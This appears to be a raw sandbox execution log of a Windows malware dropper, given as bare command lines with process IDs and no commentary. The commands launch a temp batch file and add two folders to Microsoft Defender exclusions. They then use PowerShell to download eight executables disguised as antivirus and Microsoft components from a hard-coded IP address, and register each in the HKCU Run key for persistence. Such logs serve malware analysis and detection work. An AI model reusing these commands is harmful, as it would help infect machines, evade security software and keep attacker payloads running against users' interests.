cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" C:\Users\test22\AppData\Local\Temp\lamda.cmd
2564
powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
2724
powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\ProgramLogs'"
2836
powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
2928
powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\ProgramLogs'"
3020
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
1152
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
1484
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'"
2268
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'"
2468
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftNetwork.exe' -OutFile 'C:\ProgramLogs\MicrosoftNetwork.exe'"
2600
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftRegistry.exe' -OutFile 'C:\ProgramLogs\MicrosoftRegistry.exe'"
2832
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftSecurity.exe' -OutFile 'C:\ProgramLogs\MicrosoftSecurity.exe'"
2776
powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftValidator.exe' -OutFile 'C:\ProgramLogs\MicrosoftValidator.exe'"
2940
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
2064
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
2204
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram3" /t REG_SZ /d "C:\RM\AntiVirus3.exe" /f
2368
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram4" /t REG_SZ /d "C:\RM\AntiVirus4.exe" /f
2456
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram5" /t REG_SZ /d "C:\ProgramLogs\MicrosoftNetwork.exe" /f
2580
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram6" /t REG_SZ /d "C:\ProgramLogs\MicrosoftRegistry.exe" /f
2128
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram7" /t REG_SZ /d "C:\ProgramLogs\MicrosoftSecurity.exe" /f
1304
reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram8" /t REG_SZ /d "C:\ProgramLogs\MicrosoftValidator.exe" /f
2868